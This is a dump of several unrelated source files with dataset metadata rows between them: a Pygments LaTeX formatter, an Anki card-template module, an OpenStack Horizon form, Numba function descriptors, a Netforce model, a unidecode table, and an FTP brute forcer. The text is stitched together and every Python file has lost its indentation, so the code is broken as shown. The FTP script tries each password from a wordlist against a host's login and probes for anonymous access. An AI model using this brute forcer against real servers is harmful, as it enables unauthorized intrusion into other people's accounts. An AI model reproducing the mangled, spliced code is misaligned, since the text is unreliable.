\def\%(cp)s@toks#1+{\ifx\relax#1\empty\else%%
\%(cp)s@tok{#1}\expandafter\%(cp)s@toks\fi}
\def\%(cp)s@do#1{\%(cp)s@bc{\%(cp)s@tc{\%(cp)s@ul{%%
\%(cp)s@it{\%(cp)s@bf{\%(cp)s@ff{#1}}}}}}}
\def\%(cp)s#1#2{\%(cp)s@reset\%(cp)s@toks#1+\relax+\%(cp)s@do{#2}}
%(styles)s
\def\%(cp)sZbs{\char`\\}
\def\%(cp)sZus{\char`\_}
\def\%(cp)sZob{\char`\{}
\def\%(cp)sZcb{\char`\}}
\def\%(cp)sZca{\char`\^}
\def\%(cp)sZam{\char`\&}
\def\%(cp)sZlt{\char`\<}
\def\%(cp)sZgt{\char`\>}
\def\%(cp)sZsh{\char`\#}
\def\%(cp)sZpc{\char`\%%}
\def\%(cp)sZdl{\char`\$}
\def\%(cp)sZhy{\char`\-}
\def\%(cp)sZsq{\char`\'}
\def\%(cp)sZdq{\char`\"}
\def\%(cp)sZti{\char`\~}
%% for compatibility with earlier versions
\def\%(cp)sZat{@}
\def\%(cp)sZlb{[}
\def\%(cp)sZrb{]}
\makeatother
'''
def _get_ttype_name(ttype):
fname = STANDARD_TYPES.get(ttype)
if fname:
return fname
aname = ''
while fname is None:
aname = ttype[-1] + aname
ttype = ttype.parent
fname = STANDARD_TYPES.get(ttype)
return fname + aname
class LatexFormatter(Formatter):
r"""
Format tokens as LaTeX code. This needs the `fancyvrb` and `color`
standard packages.
Without the `full` option, code is formatted as one ``Verbatim``
environment, like this:
.. sourcecode:: latex
\begin{Verbatim}[commandchars=\\\{\}]
\PY{k}{def }\PY{n+nf}{foo}(\PY{n}{bar}):
\PY{k}{pass}
\end{Verbatim}
The special command used here (``\PY``) and all the other macros it needs
are output by the `get_style_defs` method.
With the `full` option, a complete LaTeX document is output, including
the command definitions in the preamble.
The `get_style_defs()` method of a `LatexFormatter` returns a string
containing ``\def`` commands defining the macros needed inside the
``Verbatim`` environments.
Additional options accepted:
`style`
The style to use, can be a string or a Style subclass (default:
``'default'``).
`full`
Tells the formatter to output a "full" document, i.e. a complete
self-contained document (default: ``False``).
`title`
If `full` is true, the title that should be used to caption the
document (default: ``''``).
`docclass`
If the `full` option is enabled, this is the document class to use
(default: ``'article'``).
`preamble`
If the `full` option is enabled, this can be further preamble commands,
e.g. ``\usepackage`` (default: ``''``).
`linenos`
If set to ``True``, output line numbers (default: ``False``).
`linenostart`
The line number for the first line (default: ``1``).
`linenostep`
If set to a number n > 1, only every nth line number is printed.
`verboptions`
Additional options given to the Verbatim environment (see the *fancyvrb*
docs for possible values) (default: ``''``).
`commandprefix`
The LaTeX commands used to produce colored output are constructed
using this prefix and some letters (default: ``'PY'``).
.. versionadded:: 0.7
.. versionchanged:: 0.10
The default is now ``'PY'`` instead of ``'C'``.
`texcomments`
If set to ``True``, enables LaTeX comment lines. That is, LaTex markup
in comment tokens is not escaped so that LaTeX can render it (default:
``False``).
.. versionadded:: 1.2
`mathescape`
If set to ``True``, enables LaTeX math mode escape in comments. That
is, ``'$...$'`` inside a comment will trigger math mode (default:
``False``).
.. versionadded:: 1.2
`escapeinside`
If set to a string of length 2, enables escaping to LaTeX. Text
delimited by these 2 characters is read as LaTeX code and
typeset accordingly. It has no effect in string literals. It has
no effect in comments if `texcomments` or `mathescape` is
set. (default: ``''``).
.. versionadded:: 2.0
"""
name = 'LaTeX'
aliases = ['latex', 'tex']
filenames = ['*.tex']
def __init__(self, **options):
Formatter.__init__(self, **options)
self.docclass = options.get('docclass', 'article')
self.preamble = options.get('preamble', '')
self.linenos = get_bool_opt(options, 'linenos', False)
self.linenostart = abs(get_int_opt(options, 'linenostart', 1))
self.linenostep = abs(get_int_opt(options, 'linenostep', 1))
self.verboptions = options.get('verboptions', '')
self.nobackground = get_bool_opt(options, 'nobackground', False)
self.commandprefix = options.get('commandprefix', 'PY')
self.texcomments = get_bool_opt(options, 'texcomments', False)
self.mathescape = get_bool_opt(options, 'mathescape', False)
self.escapeinside = options.get('escapeinside', '')
if len(self.escapeinside) == 2:
self.left = self.escapeinside[0]
self.right = self.escapeinside[1]
else:
self.escapeinside = ''
self._create_stylesheet()
def _create_stylesheet(self):
t2n = self.ttype2name = {Token: ''}
c2d = self.cmd2def = {}
cp = self.commandprefix
def rgbcolor(col):
if col:
return ','.join(['%.2f' %(int(col[i] + col[i + 1], 16) / 255.0)
for i in (0, 2, 4)])
else:
return '1,1,1'
for ttype, ndef in self.style:
name = _get_ttype_name(ttype)
cmndef = ''
if ndef['bold']:
cmndef += r'\let\$$@bf=\textbf'
if ndef['italic']:
cmndef += r'\let\$$@it=\textit'
if ndef['underline']:
cmndef += r'\let\$$@ul=\underline'
if ndef['roman']:
cmndef += r'\let\$$@ff=\textrm'
if ndef['sans']:
cmndef += r'\let\$$@ff=\textsf'
if ndef['mono']:
cmndef += r'\let\$$@ff=\textsf'
if ndef['color']:
cmndef += (r'\def\$$@tc##1{\textcolor[rgb]{%s}{##1}}' %
rgbcolor(ndef['color']))
if ndef['border']:
cmndef += (r'\def\$$@bc##1{\setlength{\fboxsep}{0pt}'
r'\fcolorbox[rgb]{%s}{%s}{\strut ##1}}' %
(rgbcolor(ndef['border']),
rgbcolor(ndef['bgcolor'])))
elif ndef['bgcolor']:
cmndef += (r'\def\$$@bc##1{\setlength{\fboxsep}{0pt}'
r'\colorbox[rgb]{%s}{\strut ##1}}' %
rgbcolor(ndef['bgcolor']))
if cmndef == '':
continue
cmndef = cmndef.replace('$$', cp)
t2n[ttype] = name
c2d[name] = cmndef
def get_style_defs(self, arg=''):
"""
Return the command sequences needed to define the commands
used to format text in the verbatim environment. ``arg`` is ignored.
"""
cp = self.commandprefix
styles = []
for name, definition in iteritems(self.cmd2def):
styles.append(r'\expandafter\def\csname %s@tok@%s\endcsname{%s}' %
(cp, name, definition))
return STYLE_TEMPLATE % {'cp': self.commandprefix,
'styles': '\n'.join(styles)}
def format_unencoded(self, tokensource, outfile):
# TODO: add support for background colors
t2n = self.ttype2name
cp = self.commandprefix
if self.full:
realoutfile = outfile
outfile = StringIO()
outfile.write(u'\\begin{Verbatim}[commandchars=\\\\\\{\\}')
if self.linenos:
start, step = self.linenostart, self.linenostep
outfile.write(u',numbers=left' +
(start and u',firstnumber=%d' % start or u'') +
(step and u',stepnumber=%d' % step or u''))
if self.mathescape or self.texcomments or self.escapeinside:
outfile.write(u',codes={\\catcode`\\$=3\\catcode`\\^=7\\catcode`\\_=8}')
if self.verboptions:
outfile.write(u',' + self.verboptions)
outfile.write(u']\n')
for ttype, value in tokensource:
if ttype in Token.Comment:
if self.texcomments:
# Try to guess comment starting lexeme and escape it ...
start = value[0:1]
for i in xrange(1, len(value)):
if start[0] != value[i]:
break
start += value[i]
value = value[len(start):]
start = escape_tex(start, self.commandprefix)
# ... but do not escape inside comment.
value = start + value
elif self.mathescape:
# Only escape parts not inside a math environment.
parts = value.split('$')
in_math = False
for i, part in enumerate(parts):
if not in_math:
parts[i] = escape_tex(part, self.commandprefix)
in_math = not in_math
value = '$'.join(parts)
elif self.escapeinside:
text = value
value = ''
while len(text) > 0:
a,sep1,text = text.partition(self.left)
if len(sep1) > 0:
b,sep2,text = text.partition(self.right)
if len(sep2) > 0:
value += escape_tex(a, self.commandprefix) + b
else:
value += escape_tex(a + sep1 + b, self.commandprefix)
else:
value = value + escape_tex(a, self.commandprefix)
else:
value = escape_tex(value, self.commandprefix)
elif ttype not in Token.Escape:
value = escape_tex(value, self.commandprefix)
styles = []
while ttype is not Token:
try:
styles.append(t2n[ttype])
except KeyError:
# not in current style
styles.append(_get_ttype_name(ttype))
ttype = ttype.parent
styleval = '+'.join(reversed(styles))
if styleval:
spl = value.split('\n')
for line in spl[:-1]:
if line:
outfile.write("\\%s{%s}{%s}" % (cp, styleval, line))
outfile.write('\n')
if spl[-1]:
outfile.write("\\%s{%s}{%s}" % (cp, styleval, spl[-1]))
else:
outfile.write(value)
outfile.write(u'\\end{Verbatim}\n')
if self.full:
realoutfile.write(DOC_TEMPLATE %
dict(docclass = self.docclass,
preamble = self.preamble,
title = self.title,
encoding = self.encoding or 'latin1',
styledefs = self.get_style_defs(),
code = outfile.getvalue()))
class LatexEmbeddedLexer(Lexer):
r"""
This lexer takes one lexer as argument, the lexer for the language
being formatted, and the left and right delimiters for escaped text.
First everything is scanned using the language lexer to obtain
strings and comments. All other consecutive tokens are merged and
the resulting text is scanned for escaped segments, which are given
the Token.Escape type. Finally text that is not escaped is scanned
again with the language lexer.
"""
def __init__(self, left, right, lang, **options):
self.left = left
self.right = right
self.lang = lang
Lexer.__init__(self, **options)
def get_tokens_unprocessed(self, text):
buf = ''
for i, t, v in self.lang.get_tokens_unprocessed(text):
if t in Token.Comment or t in Token.String:
if buf:
for x in self.get_tokens_aux(idx, buf):
yield x
buf = ''
yield i, t, v
else:
if not buf:
idx = i
buf += v
if buf:
for x in self.get_tokens_aux(idx, buf):
yield x
def get_tokens_aux(self, index, text):
while text:
a, sep1, text = text.partition(self.left)
if a:
for i, t, v in self.lang.get_tokens_unprocessed(a):
yield index + i, t, v
index += len(a)
if sep1:
b, sep2, text = text.partition(self.right)
if sep2:
yield index + len(sep1), Token.Escape, b
index += len(sep1) + len(b) + len(sep2)
else:
yield index, Token.Error, sep1
index += len(sep1)
text = b
| gpl-3.0 | -1,509,321,526,598,820,400 | 35.751064 | 85 | 0.534997 | false |
Glutanimate/image-occlusion-2-enhanced | src/image_occlusion_enhanced/template.py | 1 | 8175 | # -*- coding: utf-8 -*-
# Image Occlusion Enhanced Add-on for Anki
#
# Copyright (C) 2016-2020 Aristotelis P. <https://glutanimate.com/>
# Copyright (C) 2012-2015 Tiago Barroso <[email protected]>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version, with the additions
# listed at the end of the license file that accompanied this program.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <https://www.gnu.org/licenses/>.
#
# NOTE: This program is subject to certain additional terms pursuant to
# Section 7 of the GNU Affero General Public License. You should have
# received a copy of these additional terms immediately following the
# terms and conditions of the GNU Affero General Public License that
# accompanied this program.
#
# If not, please request a copy through one of the means of contact
# listed here: <https://glutanimate.com/contact/>.
#
# Any modifications to this file must keep this entire header intact.
"""
Handles the IO note type and card template
"""
from .config import *
# DEFAULT CARD TEMPLATES
iocard_front = """\
{{#%(src_img)s}}
<div id="io-header">{{%(header)s}}</div>
<div id="io-wrapper">
<div id="io-overlay">{{%(que)s}}</div>
<div id="io-original">{{%(src_img)s}}</div>
</div>
<div id="io-footer">{{%(footer)s}}</div>
<script>
// Prevent original image from loading before mask
aFade = 50, qFade = 0;
var mask = document.querySelector('#io-overlay>img');
function loaded() {
var original = document.querySelector('#io-original');
original.style.visibility = "visible";
}
if (mask === null || mask.complete) {
loaded();
} else {
mask.addEventListener('load', loaded);
}
</script>
{{/%(src_img)s}}
""" % \
{'que': IO_FLDS['qm'],
'ans': IO_FLDS['am'],
'svg': IO_FLDS['om'],
'src_img': IO_FLDS['im'],
'header': IO_FLDS['hd'],
'footer': IO_FLDS['ft'],
'remarks': IO_FLDS['rk'],
'sources': IO_FLDS['sc'],
'extraone': IO_FLDS['e1'],
'extratwo': IO_FLDS['e2']}
iocard_back = """\
{{#%(src_img)s}}
<div id="io-header">{{%(header)s}}</div>
<div id="io-wrapper">
<div id="io-overlay">{{%(ans)s}}</div>
<div id="io-original">{{%(src_img)s}}</div>
</div>
{{#%(footer)s}}<div id="io-footer">{{%(footer)s}}</div>{{/%(footer)s}}
<button id="io-revl-btn" onclick="toggle();">Toggle Masks</button>
<div id="io-extra-wrapper">
<div id="io-extra">
{{#%(remarks)s}}
<div class="io-extra-entry">
<div class="io-field-descr">%(remarks)s</div>{{%(remarks)s}}
</div>
{{/%(remarks)s}}
{{#%(sources)s}}
<div class="io-extra-entry">
<div class="io-field-descr">%(sources)s</div>{{%(sources)s}}
</div>
{{/%(sources)s}}
{{#%(extraone)s}}
<div class="io-extra-entry">
<div class="io-field-descr">%(extraone)s</div>{{%(extraone)s}}
</div>
{{/%(extraone)s}}
{{#%(extratwo)s}}
<div class="io-extra-entry">
<div class="io-field-descr">%(extratwo)s</div>{{%(extratwo)s}}
</div>
{{/%(extratwo)s}}
</div>
</div>
<script>
// Toggle answer mask on clicking the image
var toggle = function() {
var amask = document.getElementById('io-overlay');
if (amask.style.display === 'block' || amask.style.display === '')
amask.style.display = 'none';
else
amask.style.display = 'block'
}
// Prevent original image from loading before mask
aFade = 50, qFade = 0;
var mask = document.querySelector('#io-overlay>img');
function loaded() {
var original = document.querySelector('#io-original');
original.style.visibility = "visible";
}
if (mask === null || mask.complete) {
loaded();
} else {
mask.addEventListener('load', loaded);
}
</script>
{{/%(src_img)s}}
""" % \
{'que': IO_FLDS['qm'],
'ans': IO_FLDS['am'],
'svg': IO_FLDS['om'],
'src_img': IO_FLDS['im'],
'header': IO_FLDS['hd'],
'footer': IO_FLDS['ft'],
'remarks': IO_FLDS['rk'],
'sources': IO_FLDS['sc'],
'extraone': IO_FLDS['e1'],
'extratwo': IO_FLDS['e2']}
iocard_css = """\
/* GENERAL CARD STYLE */
.card {
font-family: "Helvetica LT Std", Helvetica, Arial, Sans;
font-size: 150%;
text-align: center;
color: black;
background-color: white;
}
/* OCCLUSION CSS START - don't edit this */
#io-overlay {
position:absolute;
top:0;
width:100%;
z-index:3
}
#io-original {
position:relative;
top:0;
width:100%;
z-index:2;
visibility: hidden;
}
#io-wrapper {
position:relative;
width: 100%;
}
/* OCCLUSION CSS END */
/* OTHER STYLES */
#io-header{
font-size: 1.1em;
margin-bottom: 0.2em;
}
#io-footer{
max-width: 80%;
margin-left: auto;
margin-right: auto;
margin-top: 0.8em;
font-style: italic;
}
#io-extra-wrapper{
/* the wrapper is needed to center the
left-aligned blocks below it */
width: 80%;
margin-left: auto;
margin-right: auto;
margin-top: 0.5em;
}
#io-extra{
text-align:center;
display: inline-block;
}
.io-extra-entry{
margin-top: 0.8em;
font-size: 0.9em;
text-align:left;
}
.io-field-descr{
margin-bottom: 0.2em;
font-weight: bold;
font-size: 1em;
}
#io-revl-btn {
font-size: 0.5em;
}
/* ADJUSTMENTS FOR MOBILE DEVICES */
.mobile .card, .mobile #content {
font-size: 120%;
margin: 0;
}
.mobile #io-extra-wrapper {
width: 95%;
}
.mobile #io-revl-btn {
font-size: 0.8em;
}
"""
# INCREMENTAL UPDATES
html_overlay_onload = """\
<script>
// Prevent original image from loading before mask
aFade = 50, qFade = 0;
var mask = document.querySelector('#io-overlay>img');
function loaded() {
var original = document.querySelector('#io-original');
original.style.visibility = "visible";
}
if (mask.complete) {
loaded();
} else {
mask.addEventListener('load', loaded);
}
</script>\
"""
css_original_hide = """\
/* Anki 2.1 additions */
#io-original {
visibility: hidden;
}\
"""
# List structure:
# (<version addition was introduced in>,
# (<qfmt_addition>, <afmt_addition>, <css_addition>))
# versions need to be ordered by semantic versioning
additions_by_version = [
(
1.30,
(html_overlay_onload, html_overlay_onload, css_original_hide)
),
]
def add_io_model(col):
models = col.models
io_model = models.new(IO_MODEL_NAME)
# Add fields:
for i in IO_FLDS_IDS:
fld = models.newField(IO_FLDS[i])
if i == "note_id":
fld['size'] = 0
models.addField(io_model, fld)
# Add template
template = models.newTemplate(IO_CARD_NAME)
template['qfmt'] = iocard_front
template['afmt'] = iocard_back
io_model['css'] = iocard_css
io_model['sortf'] = 1 # set sortfield to header
models.addTemplate(io_model, template)
models.add(io_model)
return io_model
def reset_template(col):
print("Resetting IO Enhanced card template to defaults")
io_model = col.models.byName(IO_MODEL_NAME)
template = io_model['tmpls'][0]
template['qfmt'] = iocard_front
template['afmt'] = iocard_back
io_model['css'] = iocard_css
col.models.save()
return io_model
def update_template(col, old_version):
print("Updating IO Enhanced card template")
additions = [[], [], []]
for version, components in additions_by_version:
if old_version >= version:
continue
for lst, addition in zip(additions, components):
lst.append(addition)
io_model = col.models.byName(IO_MODEL_NAME)
if not io_model:
return add_io_model(col)
template = io_model['tmpls'][0]
template['qfmt'] += "\n".join(additions[0])
template['afmt'] += "\n".join(additions[1])
io_model['css'] += "\n".join(additions[2])
col.models.save()
return io_model
| bsd-2-clause | 1,233,133,579,582,542,800 | 23.848024 | 74 | 0.627523 | false |
aaronorosen/horizon-congress | openstack_dashboard/dashboards/project/networks/ports/forms.py | 4 | 2591 | # Copyright 2012 NEC Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import logging
from django.core.urlresolvers import reverse
from django.utils.translation import ugettext_lazy as _
from horizon import exceptions
from horizon import forms
from horizon import messages
from openstack_dashboard import api
LOG = logging.getLogger(__name__)
class UpdatePort(forms.SelfHandlingForm):
network_id = forms.CharField(widget=forms.HiddenInput())
port_id = forms.CharField(widget=forms.HiddenInput())
name = forms.CharField(max_length=255,
label=_("Name"),
required=False)
admin_state = forms.BooleanField(label=_("Admin State"), required=False)
failure_url = 'horizon:project:networks:detail'
def __init__(self, request, *args, **kwargs):
super(UpdatePort, self).__init__(request, *args, **kwargs)
if api.neutron.is_extension_supported(request, 'mac-learning'):
self.fields['mac_state'] = forms.BooleanField(
label=_("Mac Learning State"), required=False)
def handle(self, request, data):
try:
LOG.debug('params = %s' % data)
extension_kwargs = {}
if 'mac_state' in data:
extension_kwargs['mac_learning_enabled'] = data['mac_state']
port = api.neutron.port_update(request, data['port_id'],
name=data['name'],
admin_state_up=data['admin_state'],
**extension_kwargs)
msg = _('Port %s was successfully updated.') % data['port_id']
LOG.debug(msg)
messages.success(request, msg)
return port
except Exception:
msg = _('Failed to update port %s') % data['port_id']
LOG.info(msg)
redirect = reverse(self.failure_url,
args=[data['network_id']])
exceptions.handle(request, msg, redirect=redirect)
| apache-2.0 | 6,717,944,019,125,245,000 | 39.484375 | 78 | 0.60633 | false |
redknight1138/First | attack/ftp.py | 3 | 2460 | #!./env/bin/python
""" FTP Scanner/Brute Forcer
Use this to either scan a host for anonymous FTP logins or
to try a password list against a host.
Don't be a moron, please don't use this for something illegal.
Usage:
ftp.py brute [-v] <host> <user> <password_file>
ftp.py anon [-v] <host>
ftp.py -h | --help
ftp.py --version
Options:
-v verbose
-h --help Show this screen.
--version Show version
Examples:
./ftp.py anon ftp.debian.org
./ftp.py brute localhost root wordlist/general/big.txt
./ftp.py brute -v localhost root wordlist/general/common.txt
"""
import ftplib
from docopt import docopt
from colorama import Fore, init
def brute_login(hostname, user_name, password_file, verbose=False):
fp = open(password_file, 'r')
for line in fp.readlines():
password = line.strip('\r').strip('\n')
if verbose:
print "[+] Trying: " + user_name + "/" + password
try:
ftp = ftplib.FTP(hostname)
ftp.login(user_name, password)
ftp.quit()
return (user_name, password)
except Exception:
pass
return False
def anon_login(hostname):
try:
ftp = ftplib.FTP(hostname)
ftp.login('anonymous', '[email protected]')
ftp.quit()
return True
except Exception:
return False
def main(arguments):
if arguments['anon']:
anon = anon_login(arguments['host'])
if anon:
print Fore.GREEN + '[*] ' + str(arguments['host']) + ' FTP Anonymous Logon Succeeded.' + Fore.RESET
else:
print Fore.RED + '[-] ' + str(arguments['host']) + ' FTP Anonymous Logon Failed.' + Fore.RESET
elif arguments['brute']:
if arguments['-v']:
credentials = brute_login(arguments['<host>'], arguments['<user>'], arguments['<password_file>'], verbose=True)
else:
credentials = brute_login(arguments['<host>'], arguments['<user>'], arguments['<password_file>'])
if credentials:
print Fore.GREEN + '[*] FTP Logon Succeeded: ' + credentials[0] + ":" + credentials[1] + Fore.RESET
else:
print Fore.RED + '[-] No password found for that user on the FTP server.' + Fore.RESET
if __name__ == '__main__':
init()
arguments = docopt(__doc__, version="0.1")
main(arguments)
| mit | 1,171,876,462,818,232,600 | 27.275862 | 123 | 0.569919 | false |
pitrou/numba | numba/funcdesc.py | 2 | 6703 | """
Function descriptors.
"""
from __future__ import print_function, division, absolute_import
from collections import defaultdict
import itertools
import sys
from types import ModuleType
from . import six, types
def transform_arg_name(arg):
if isinstance(arg, types.Record):
return "Record_%s" % arg._code
elif (isinstance(arg, types.Array) and
isinstance(arg.dtype, types.Record)):
type_name = "array" if arg.mutable else "readonly array"
return ("%s(Record_%s, %sd, %s)"
% (type_name, arg.dtype._code, arg.ndim, arg.layout))
else:
return str(arg)
def default_mangler(name, argtypes):
codedargs = '.'.join(transform_arg_name(a).replace(' ', '_')
for a in argtypes)
return '.'.join([name, codedargs])
# A dummy module for dynamically-generated functions
_dynamic_modname = '<dynamic>'
_dynamic_module = ModuleType(_dynamic_modname)
_dynamic_module.__builtins__ = six.moves.builtins
class FunctionDescriptor(object):
"""
Base class for function descriptors: an object used to carry
useful metadata about a natively callable function.
"""
__slots__ = ('native', 'modname', 'qualname', 'doc', 'typemap',
'calltypes', 'args', 'kws', 'restype', 'argtypes',
'mangled_name', 'unique_name', 'inline')
_unique_ids = itertools.count(1)
def __init__(self, native, modname, qualname, unique_name, doc,
typemap, restype, calltypes, args, kws, mangler=None,
argtypes=None, inline=False):
self.native = native
self.modname = modname
self.qualname = qualname
self.unique_name = unique_name
self.doc = doc
self.typemap = typemap
self.calltypes = calltypes
self.args = args
self.kws = kws
self.restype = restype
# Argument types
if argtypes is not None:
self.argtypes = argtypes
else:
# Get argument types from the type inference result
# (note the "arg.FOO" convention as used in typeinfer
self.argtypes = [self.typemap['arg.' + a] for a in args]
mangler = default_mangler if mangler is None else mangler
# The mangled name *must* be unique, else the wrong function can
# be chosen at link time.
if self.modname:
self.mangled_name = mangler('%s.%s' % (self.modname, self.unique_name),
self.argtypes)
else:
self.mangled_name = mangler(self.unique_name, self.argtypes)
self.inline = inline
def lookup_module(self):
"""
Return the module in which this function is supposed to exist.
This may be a dummy module if the function was dynamically
generated.
"""
if self.modname == _dynamic_modname:
return _dynamic_module
else:
return sys.modules[self.modname]
def lookup_function(self):
"""
Return the original function object described by this object.
"""
return getattr(self.lookup_module(), self.qualname)
@property
def llvm_func_name(self):
"""
The LLVM-registered name for the raw function.
"""
return self.mangled_name
@property
def llvm_cpython_wrapper_name(self):
"""
The LLVM-registered name for a CPython-compatible wrapper of the
raw function (i.e. a PyCFunctionWithKeywords).
"""
return 'wrapper.' + self.mangled_name
def __repr__(self):
return "<function descriptor %r>" % (self.unique_name)
@classmethod
def _get_function_info(cls, interp):
"""
Returns
-------
qualname, unique_name, modname, doc, args, kws, globals
``unique_name`` must be a unique name.
"""
func = interp.bytecode.func
qualname = interp.bytecode.func_qualname
modname = func.__module__
doc = func.__doc__ or ''
args = tuple(interp.arg_names)
kws = () # TODO
if modname is None:
# Dynamically generated function.
modname = _dynamic_modname
# Even the same function definition can be compiled into
# several different function objects with distinct closure
# variables, so we make sure to disambiguish using an unique id.
unique_name = "%s$%d" % (qualname, next(cls._unique_ids))
return qualname, unique_name, modname, doc, args, kws
@classmethod
def _from_python_function(cls, interp, typemap, restype, calltypes,
native, mangler=None, inline=False):
(qualname, unique_name, modname, doc, args, kws,
)= cls._get_function_info(interp)
self = cls(native, modname, qualname, unique_name, doc,
typemap, restype, calltypes,
args, kws, mangler=mangler, inline=inline)
return self
class PythonFunctionDescriptor(FunctionDescriptor):
"""
A FunctionDescriptor subclass for Numba-compiled functions.
"""
__slots__ = ()
@classmethod
def from_specialized_function(cls, interp, typemap, restype, calltypes,
mangler, inline):
"""
Build a FunctionDescriptor for a given specialization of a Python
function (in nopython mode).
"""
return cls._from_python_function(interp, typemap, restype, calltypes,
native=True, mangler=mangler,
inline=inline)
@classmethod
def from_object_mode_function(cls, interp):
"""
Build a FunctionDescriptor for an object mode variant of a Python
function.
"""
typemap = defaultdict(lambda: types.pyobject)
calltypes = typemap.copy()
restype = types.pyobject
return cls._from_python_function(interp, typemap, restype, calltypes,
native=False)
class ExternalFunctionDescriptor(FunctionDescriptor):
"""
A FunctionDescriptor subclass for opaque external functions
(e.g. raw C functions).
"""
__slots__ = ()
def __init__(self, name, restype, argtypes):
args = ["arg%d" % i for i in range(len(argtypes))]
super(ExternalFunctionDescriptor, self).__init__(native=True,
modname=None, qualname=name, unique_name=name, doc='',
typemap=None, restype=restype, calltypes=None,
args=args, kws=None, mangler=lambda a, x: a,
argtypes=argtypes)
| bsd-2-clause | 5,825,912,725,351,149,000 | 33.374359 | 83 | 0.588841 | false |
sidzan/netforce | netforce_account/netforce_account/models/account_budget.py | 4 | 1571 | # Copyright (c) 2012-2015 Netforce Co. Ltd.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE
# OR OTHER DEALINGS IN THE SOFTWARE.
from netforce.model import Model, fields
class Budget(Model):
_name = "account.budget"
_string = "Budget"
_key = ["name"]
_fields = {
"name": fields.Char("Name", required=True, search=True),
"date_from": fields.Date("From Date"),
"date_to": fields.Date("To Date", required=True, search=True),
"lines": fields.One2Many("account.budget.line", "budget_id", "Budget Items"),
}
_order = "name"
Budget.register()
| mit | 6,020,272,555,940,924,000 | 42.638889 | 85 | 0.723743 | false |
ukanga/SickRage | lib/unidecode/x084.py | 252 | 4646 | data = (
'Hu ', # 0x00
'Qi ', # 0x01
'He ', # 0x02
'Cui ', # 0x03
'Tao ', # 0x04
'Chun ', # 0x05
'Bei ', # 0x06
'Chang ', # 0x07
'Huan ', # 0x08
'Fei ', # 0x09
'Lai ', # 0x0a
'Qi ', # 0x0b
'Meng ', # 0x0c
'Ping ', # 0x0d
'Wei ', # 0x0e
'Dan ', # 0x0f
'Sha ', # 0x10
'Huan ', # 0x11
'Yan ', # 0x12
'Yi ', # 0x13
'Tiao ', # 0x14
'Qi ', # 0x15
'Wan ', # 0x16
'Ce ', # 0x17
'Nai ', # 0x18
'Kutabireru ', # 0x19
'Tuo ', # 0x1a
'Jiu ', # 0x1b
'Tie ', # 0x1c
'Luo ', # 0x1d
'[?] ', # 0x1e
'[?] ', # 0x1f
'Meng ', # 0x20
'[?] ', # 0x21
'Yaji ', # 0x22
'[?] ', # 0x23
'Ying ', # 0x24
'Ying ', # 0x25
'Ying ', # 0x26
'Xiao ', # 0x27
'Sa ', # 0x28
'Qiu ', # 0x29
'Ke ', # 0x2a
'Xiang ', # 0x2b
'Wan ', # 0x2c
'Yu ', # 0x2d
'Yu ', # 0x2e
'Fu ', # 0x2f
'Lian ', # 0x30
'Xuan ', # 0x31
'Yuan ', # 0x32
'Nan ', # 0x33
'Ze ', # 0x34
'Wo ', # 0x35
'Chun ', # 0x36
'Xiao ', # 0x37
'Yu ', # 0x38
'Pian ', # 0x39
'Mao ', # 0x3a
'An ', # 0x3b
'E ', # 0x3c
'Luo ', # 0x3d
'Ying ', # 0x3e
'Huo ', # 0x3f
'Gua ', # 0x40
'Jiang ', # 0x41
'Mian ', # 0x42
'Zuo ', # 0x43
'Zuo ', # 0x44
'Ju ', # 0x45
'Bao ', # 0x46
'Rou ', # 0x47
'Xi ', # 0x48
'Xie ', # 0x49
'An ', # 0x4a
'Qu ', # 0x4b
'Jian ', # 0x4c
'Fu ', # 0x4d
'Lu ', # 0x4e
'Jing ', # 0x4f
'Pen ', # 0x50
'Feng ', # 0x51
'Hong ', # 0x52
'Hong ', # 0x53
'Hou ', # 0x54
'Yan ', # 0x55
'Tu ', # 0x56
'Zhu ', # 0x57
'Zi ', # 0x58
'Xiang ', # 0x59
'Shen ', # 0x5a
'Ge ', # 0x5b
'Jie ', # 0x5c
'Jing ', # 0x5d
'Mi ', # 0x5e
'Huang ', # 0x5f
'Shen ', # 0x60
'Pu ', # 0x61
'Gai ', # 0x62
'Dong ', # 0x63
'Zhou ', # 0x64
'Qian ', # 0x65
'Wei ', # 0x66
'Bo ', # 0x67
'Wei ', # 0x68
'Pa ', # 0x69
'Ji ', # 0x6a
'Hu ', # 0x6b
'Zang ', # 0x6c
'Jia ', # 0x6d
'Duan ', # 0x6e
'Yao ', # 0x6f
'Jun ', # 0x70
'Cong ', # 0x71
'Quan ', # 0x72
'Wei ', # 0x73
'Xian ', # 0x74
'Kui ', # 0x75
'Ting ', # 0x76
'Hun ', # 0x77
'Xi ', # 0x78
'Shi ', # 0x79
'Qi ', # 0x7a
'Lan ', # 0x7b
'Zong ', # 0x7c
'Yao ', # 0x7d
'Yuan ', # 0x7e
'Mei ', # 0x7f
'Yun ', # 0x80
'Shu ', # 0x81
'Di ', # 0x82
'Zhuan ', # 0x83
